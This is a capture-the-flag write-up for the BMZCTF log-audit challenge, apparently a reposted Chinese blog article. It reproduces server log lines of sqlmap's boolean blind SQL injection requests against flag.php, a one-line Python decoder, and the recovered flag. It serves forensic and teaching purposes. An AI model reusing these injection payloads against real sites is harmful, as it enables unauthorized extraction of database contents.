BMZCTF:日志审计

2024-01-01 03:31
文章标签 日志 审计 bmzctf

本文主要是介绍BMZCTF:日志审计,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧! 

http://bmzclub.cn/challenges#%E6%97%A5%E5%BF%97%E5%AE%A1%E8%AE%A1

在这里插入图片描述
logcheck.log
在这里插入图片描述
盲注的日志,将flag.php这块的内容提取出来

192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C1%2C1%29%29%3D102--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C2%2C1%29%29%3D108--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C3%2C1%29%29%3D97--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C4%2C1%29%29%3D103--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C5%2C1%29%29%3D123--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C6%2C1%29%29%3D109--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C7%2C1%29%29%3D97--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C8%2C1%29%29%3D121--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C9%2C1%29%29%3D105--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C10%2C1%29%29%3D121--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C11%2C1%29%29%3D97--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C12%2C1%29%29%3D104--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C13%2C1%29%29%3D101--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C14%2C1%29%29%3D105--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C15%2C1%29%29%3D49--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C16%2C1%29%29%3D57--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C17%2C1%29%29%3D54--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C18%2C1%29%29%3D53--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C19%2C1%29%29%3D97--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C20%2C1%29%29%3D101--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C21%2C1%29%29%3D55--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C22%2C1%29%29%3D53--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C23%2C1%29%29%3D54--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C24%2C1%29%29%3D57--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"
192.168.0.1 - - [13/Oct/2018:12:38:14 +0000] "GET /flag.php?user=hence%27%20AND%20ORD%28MID%28%28SELECT%20IFNULL%28CAST%28secret%20AS%20CHAR%29%2C0x20%29%20FROM%20haozi.secrets%20ORDER%20BY%20secret%20LIMIT%200%2C1%29%2C38%2C1%29%29%3D125--%20pZaF HTTP/1.1" 200 327 "-" "sqlmap/1.2#pip (http://sqlmap.org)"

Python处理提取出flag

from urllib.parse import unquotewith open('./data.txt') as f:lines = f.readlines()for line in lines:line = unquote(line)line = line[line.find('))=')+3:line.find('--')]print(chr(int(line)),end="")

在这里插入图片描述

flag{mayiyahei1965ae7569}

这篇关于BMZCTF:日志审计的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!


http://www.chinasem.cn/article/558046

相关文章

SpringBoot日志级别与日志分组详解

SpringBoot日志级别与日志分组详解

《SpringBoot日志级别与日志分组详解》文章介绍了日志级别(ALL至OFF)及其作用,说明SpringBoot默认日志级别为INFO,可通过application.properties调整全局或... 目录日志级别1、级别内容2、调整日志级别调整默认日志级别调整指定类的日志级别项目开发过程中,利用日志
阅读更多...
深度剖析SpringBoot日志性能提升的原因与解决

深度剖析SpringBoot日志性能提升的原因与解决

《深度剖析SpringBoot日志性能提升的原因与解决》日志记录本该是辅助工具,却为何成了性能瓶颈,SpringBoot如何用代码彻底破解日志导致的高延迟问题,感兴趣的小伙伴可以跟随小编一起学习一下... 目录前言第一章:日志性能陷阱的底层原理1.1 日志级别的“双刃剑”效应1.2 同步日志的“吞吐量杀手”
阅读更多...
java -jar example.jar 产生的日志输出到指定文件的方法

java -jar example.jar 产生的日志输出到指定文件的方法

《java-jarexample.jar产生的日志输出到指定文件的方法》这篇文章给大家介绍java-jarexample.jar产生的日志输出到指定文件的方法,本文给大家介绍的非常详细,对大家的... 目录怎么让 Java -jar example.jar 产生的日志输出到指定文件一、方法1:使用重定向1、
阅读更多...
c++日志库log4cplus快速入门小结

c++日志库log4cplus快速入门小结

《c++日志库log4cplus快速入门小结》文章浏览阅读1.1w次,点赞9次,收藏44次。本文介绍Log4cplus,一种适用于C++的线程安全日志记录API,提供灵活的日志管理和配置控制。文章涵盖... 目录简介日志等级配置文件使用关于初始化使用示例总结参考资料简介log4j 用于Java,log4c
阅读更多...
Android 缓存日志Logcat导出与分析最佳实践

Android 缓存日志Logcat导出与分析最佳实践

《Android缓存日志Logcat导出与分析最佳实践》本文全面介绍AndroidLogcat缓存日志的导出与分析方法,涵盖按进程、缓冲区类型及日志级别过滤,自动化工具使用,常见问题解决方案和最佳实... 目录android 缓存日志(Logcat)导出与分析全攻略为什么要导出缓存日志?按需过滤导出1. 按
阅读更多...
nginx配置错误日志的实现步骤

nginx配置错误日志的实现步骤

《nginx配置错误日志的实现步骤》配置nginx代理过程中,如果出现错误,需要看日志,可以把nginx日志配置出来,以便快速定位日志问题,下面就来介绍一下nginx配置错误日志的实现步骤,感兴趣的可... 目录前言nginx配置错误日志总结前言在配置nginx代理过程中,如果出现错误,需要看日志,可以把
阅读更多...
Spring Boot集成/输出/日志级别控制/持久化开发实践

Spring Boot集成/输出/日志级别控制/持久化开发实践

《SpringBoot集成/输出/日志级别控制/持久化开发实践》SpringBoot默认集成Logback,支持灵活日志级别配置(INFO/DEBUG等),输出包含时间戳、级别、类名等信息,并可通过... 目录一、日志概述1.1、Spring Boot日志简介1.2、日志框架与默认配置1.3、日志的核心作用
阅读更多...
深度解析Nginx日志分析与499状态码问题解决

深度解析Nginx日志分析与499状态码问题解决

《深度解析Nginx日志分析与499状态码问题解决》在Web服务器运维和性能优化过程中,Nginx日志是排查问题的重要依据,本文将围绕Nginx日志分析、499状态码的成因、排查方法及解决方案展开讨论... 目录前言1. Nginx日志基础1.1 Nginx日志存放位置1.2 Nginx日志格式2. 499
阅读更多...
MySQL进行数据库审计的详细步骤和示例代码

MySQL进行数据库审计的详细步骤和示例代码

《MySQL进行数据库审计的详细步骤和示例代码》数据库审计通过触发器、内置功能及第三方工具记录和监控数据库活动,确保安全、完整与合规,Java代码实现自动化日志记录,整合分析系统提升监控效率,本文给大... 目录一、数据库审计的基本概念二、使用触发器进行数据库审计1. 创建审计表2. 创建触发器三、Java
阅读更多...
使用Python构建一个高效的日志处理系统

使用Python构建一个高效的日志处理系统

《使用Python构建一个高效的日志处理系统》这篇文章主要为大家详细讲解了如何使用Python开发一个专业的日志分析工具,能够自动化处理、分析和可视化各类日志文件,大幅提升运维效率,需要的可以了解下... 目录环境准备工具功能概述完整代码实现代码深度解析1. 类设计与初始化2. 日志解析核心逻辑3. 文件处
阅读更多...

Copyright China编程 23002807@qq.com

沪ICP备2023033072号-2